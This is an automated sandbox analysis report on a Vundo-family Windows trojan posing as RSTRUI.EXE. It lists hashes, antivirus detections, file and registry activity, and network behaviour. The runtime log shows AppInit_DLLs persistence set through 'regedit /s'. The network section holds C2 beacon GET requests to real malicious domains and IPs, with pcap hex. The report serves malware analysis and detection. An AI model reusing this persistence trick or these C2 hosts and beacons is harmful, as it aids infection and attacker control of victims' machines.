Analysis Date2014-10-08 11:37:34
MD5cfbdd820df44aa36a2575c0f22958b57
SHA10c16b6126fb75b1473f6af9447ec6622f4c78a28

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 13cc2cc8e384da536037e937ba7a07c7 sha1: 3b6f047661e98ebbaeda2e7379814973cbfc4313 size: 91136
Section_ASM2 md5: 1a932c7fa0a0eb8fb6d26f1f8905d189 sha1: 489594f1e9303a2903ffa00476b76b9a4766ce24 size: 63488
Section.rdata md5: 697c99e6dde9d3dcac304d26c87cc98b sha1: 00ef47a581e72f5f3047d4b8886ee2a33260ef4e size: 8192
Section.data md5: 6ae74fc20e4cf7b1e3a120e127950658 sha1: 195f91bc01ed5306654b41943751edba8e59b1c3 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp2012-09-26 05:01:05
VersionLegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
PackerMicrosoft Visual C++ ?.?
PEhash4d1a23f74f3adcb3ccf36dd24ca511a862182928
IMPhash26c8b4c4ce534a10cda2844fc8da413a
AV360 SafeGen:Variant.Spy.5
AVAd-AwareGen:Variant.Spy.5
AVAlwil (avast)Vundo-XK [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen7
AVCA (E-Trust Ino)Win32/Vundo.N!generic
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17986
AVEmsisoftGen:Variant.Spy.5
AVEset (nod32)Win32/Kryptik.AMHQ
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Spy.5
AVGrisoft (avg)Generic29.BSEH
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.FakeMS.ED
AVMcafeeVundo-FASV!CFBDD820DF44
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Spy.5
AVNormanwinpe/Vundo.CRIM
AVRisingno_virus
AVSophosMal/Vundo-M
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)TrojanDropper.Daws
AVYara APTno_virus
AVZillya!no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\zzthrqe.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSvertilaza.com
Winsock DNS91.220.35.154
Winsock DNSterrans.su
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSverzinla.com
Winsock DNSgetintsu.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSinzavora.com
Winsock DNSodobvare.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\zzthrqe.dll\\x00

Network Details:

DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
141.8.225.80
DNSfescheck.com
Type: A
141.8.225.80
DNSinzavora.com
Type: A
141.8.225.80
DNSvertilaza.com
Type: A
DNSverzinla.com\032
Type: A
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSodobvare.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSdenadb.com
Type: A
DNSforadns.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzSqKc8+o8Cd
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzWYJcslalVd
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V5tSrUWFiWIV
User-Agent:
HTTP GEThttp://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1
User-Agent:
HTTP GEThttp://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V+ZSgibLVKLa
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 30382661   XX0000&key=108&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37353226 6f733d35 2e312e32 3630302e   752&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   7967386d 485a4653 42437134 59437934   yg8mHZFSBCq4YCy4
0x000000b0 (00176)   78664567 7358694d 4f5a2f4a 734e2f37   xfEgsXiMOZ/JsN/7
0x000000c0 (00192)   3356774e 37762f64 42553041 31204854   3VwN7v/dBU0A1 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   74696e74 73752e63 6f6d0d0a 0d0a       tintsu.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 30382661   XX0000&key=108&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37353226 6f733d35 2e312e32 3630302e   752&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   7967386d 485a4653 42437134 59437934   yg8mHZFSBCq4YCy4
0x000000b0 (00176)   78664567 7358694d 4f5a2f4a 734e2f37   xfEgsXiMOZ/JsN/7
0x000000c0 (00192)   33567a53 714b6338 2b6f3843 64204854   3VzSqKc8+o8Cd HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 30382661   XX0000&key=108&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37353226 6f733d35 2e312e32 3630302e   752&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   7967386d 485a4653 42437134 59437934   yg8mHZFSBCq4YCy4
0x000000b0 (00176)   78664567 7358694d 4f5a2f4a 734e2f37   xfEgsXiMOZ/JsN/7
0x000000c0 (00192)   33567a57 594a6373 6c616c56 64204854   3VzWYJcslalVd HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 30382661   XX0000&key=108&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37353226 6f733d35 2e312e32 3630302e   752&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   7967386d 485a4653 42437134 59437934   yg8mHZFSBCq4YCy4
0x000000b0 (00176)   78664567 7358694d 4f5a2f4a 734e2f37   xfEgsXiMOZ/JsN/7
0x000000c0 (00192)   33563574 53725557 46695749 56204854   3V5tSrUWFiWIV HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206665   TP/1.1..Host: fe
0x000000e0 (00224)   73636865 636b2e63 6f6d0d0a 0d0a0a     scheck.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 30382661   XX0000&key=108&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37353226 6f733d35 2e312e32 3630302e   752&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   7967386d 485a4653 42437134 59437934   yg8mHZFSBCq4YCy4
0x000000b0 (00176)   78664567 7358694d 4f5a2f4a 734e2f37   xfEgsXiMOZ/JsN/7
0x000000c0 (00192)   3356774e 37762f64 42553041 31204854   3VwN7v/dBU0A1 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   7a61766f 72612e63 6f6d0d0a 0d0a0a     zavora.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 30382661   XX0000&key=108&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37353226 6f733d35 2e312e32 3630302e   752&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   7967386d 485a4653 42437134 59437934   yg8mHZFSBCq4YCy4
0x000000b0 (00176)   78664567 7358694d 4f5a2f4a 734e2f37   xfEgsXiMOZ/JsN/7
0x000000c0 (00192)   33562b5a 53676962 4c564b4c 61204854   3V+ZSgibLVKLa HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323230 2e33352e 3135340d 0a0d0a     .220.35.154....


Strings
P
.
.n
I
'
E
.
uriVurittcetorla
\
.CC
 
.z?..LM.
..
.Y.
.
041904B0
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
333f3
5.1.2600.5512
5.1.2600.5512 (xpsp.080413-2108)
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
f3fff
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
 Microsoft
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
RSTRUI.EXE
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
 Windows
                          
@@@@?$@@@
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
 0eP,0
0rebgY
0SSSSS
0_tORKdr
0t Sd/`iebrQMe ni
1b pn;
1in1DW
2 ?(4pV<
24Yu~f
$,2<Ba
2cdli1
2eesHB4dMMy
2eiyPU
2{v9a+
#)39>/syci
3es_eZ
3uoTY;9
43Peyh
4Cede+pssenOVC
)59EmjYeiu
</5?eF
#<5L\86
5_VnP/
60ve#;
6BMjtE
6-!;gc n
6htxDb
-6IN*eln
6-noXG het
6stsH\
6-uc:0t or}
72oslI
7'.MI@
82|/1!8]
8;7780
8JkD``
8k#L,s/
[8L(zS9
9@=h?K:1
!9n'0(
@9P+?`
9u084P
>&a2z@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
^A:d3=
@+AlcT
ALrIdm.WnmtH
An application has made an attempt to load the C runtime library incorrectly.
aOcCv{eeler{r
APAW.>
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
A%*wXa
 a`Y7W
&BBBBPvBBB
BeginPaint
BF@BRB
BPh@X+B
c2hcF_
@c33Yn6x
c;4V@3
C;5Jg`j
ca_rJP
ce[)"I
cgaLLQ )fo
c;h$Py
c.lFLFa
CloseHandle
CorExitProcess
CreateSolidBrush
CreateWindowExA
- CRT not initialized
cuMuE3
cxsyld>lSt
    _D
d2<4GzS
@.data
DateTime:%04d.%02d:%d
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
	DdR.Lr
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DestroyWindow
DeviceIoControl
dignyeae=
	Dimwt
DispatchMessageA
DOMAIN error
DottnQieF3
DPT`f{t
DrawTextA
dSihb;AeeF
+, dy	
(D&ylxH
e0ee0)
.eagsN
ed58hi2b50r6
eefiF_rai
|(@eGX4
ehCyuia
"Ejb3]EuuC9
ekrnEmon.dll
eMN5i$
EncodePointer
EndPaint
enepWZeim
EnterCriticalSection
!etetl\Al
eutyotpacr~eue
ev]sS,
ExitProcess
f2Yon~@
@fa=]u
]Faxte
}fdeie=~_NEo
February
FindResourceA
FL4Q$7
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
F_mr{eF
fnMota
@FPY? F9YP+[
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
frvBTIV
=fTr\ 
f u>op
%Fxf+h
G0ZkfNL
-G4jX,
gc-#~FK
gc tF@ain
gcucf+
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GetVersionExA
g{gfMnb
]@GH@-5
;GKWi|KW{
-gp\t$
h2$e e
H6rteo
hBRj:c
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
h>jEHS
!hLoi<8:
hPHql@
iAUTg`E
ib,[AQ4:*
'I\;gkw
Ih+3BC.Y4
'?iHle
iKZ1+F
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
/I!WJ>
IwNDvG
JanFebMarAprMayJunJulAugSepOctNovDec
January
JATFi[
J\eD]j2C
j@j ^V
JLFuVY
jNEF~.
JVZF52Z
K4.1t0
kB vuM
KCEi<tCoip
KERNEL32.dll
K@P\;o@FtYD
KWI(|q
K$X=*z>,g
LCMapStringA
LCMapStringW
LeaveCriticalSection
Ll>Sic
LoadAcceleratorsA
LoadCursorA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lstrcmpiA
lt13Hl
Lw7omY
MD@@\`
>mEEUB
MessageBoxA
ME@UE<
Microsoft Visual C++ Runtime Library
~MidpNOii
Mio#;laeH
MM/dd/yy
Monday
mOtSTMA
MultiByteToWideChar
mx(HMw
*neei%
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
n pt0D6-Ctfxz
NW{G6N
nWGn]@dGil
(oaAnIR
oAMQ]K
October
o]?eioeoxt
OepaP=>
 oit.=n
,  okv
O_}lAc
oNun\Kt
oPetvBLabt
orTorA
ot@@@@
O_VTO<
p0*mnwu{forg
P$:dMy
PGt>Ps
)	Pku+
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
#PSa|K
@Pu<i;
- pure virtual function call
}@@@@QK
=<Qt>&
QueryPerformanceCounter
QW/I&J
/raK'	
-r=B3D
`.rdata
r\e3rN
Rectangle
RegisterClassExA
riabvt
RJk6uA
rPcrxX\.
rsNrke
RtlUnwind
rtZVg.xg
runtime error 
Runtime Error!
?rY]GT
s>7adydv
Saturday
!_s=,D{/
September
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
ShowWindow
si\iC'eR
SING error
SI-	;r[
sJk[0+/l
strcat
Sunday
SunMonTueWedThuFriSat
(sv)Vc
,t\.?$
tcr!>rrid
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
tiYtGoGo
tJpclFN
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
 tlWt=
tmtVoqe
T/?n\L
T nMgd
toarzk
;T|pVfg
TranslateAcceleratorA
TranslateMessage
trntKMTIrm
t"SS9]
@t=tuD
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
!@ tz1t
u-IN}t]
u;Krna
Un6uuPP
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
))u o 
UotTLE
uOu:XM 
UpdateWindow
U p i=
UQPXY]Y[
Uqxf+v0
URPQQh
USER32.dll
USER32.DLL
u%UOk0
=uUYYHE
v8DHTB
VBNetStudio
VirtualAlloc
VirtualFree
v	N+D$
VRlP1pct
VUkrb2
W>anq0
^W,BU,
W:D\qW
Wednesday
WideCharToMultiByte
	wI+lGq
WriteFile
wsprintfA
@^_wst
wtDDDDDDDC
,wV:Ph Q
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwwwz
wwwwwwwwwwwwwz
wwwwwwwwwwwwwzwwww
wwwwwwwwzww
wwwwwwwxx
wwwwwwwz
wwwwwwwzww
ww	y?J
wXh_7~
XaPT5M
xLW@t%
X nuaO
XSKf|`
Y)/>_,
*@*!YB
y@FpY!mF
,yisS=
 yM}+ro
>yNvS$
YS j4*
>=Yt1j
Yvr:q&W
YyC3Vj@
Z90&MZK
ZA,9PM
$zaN|-
zelSlTBM
zFJV5t
$z}jd-
ZRichN=
ZUWFZN 
z'W`gp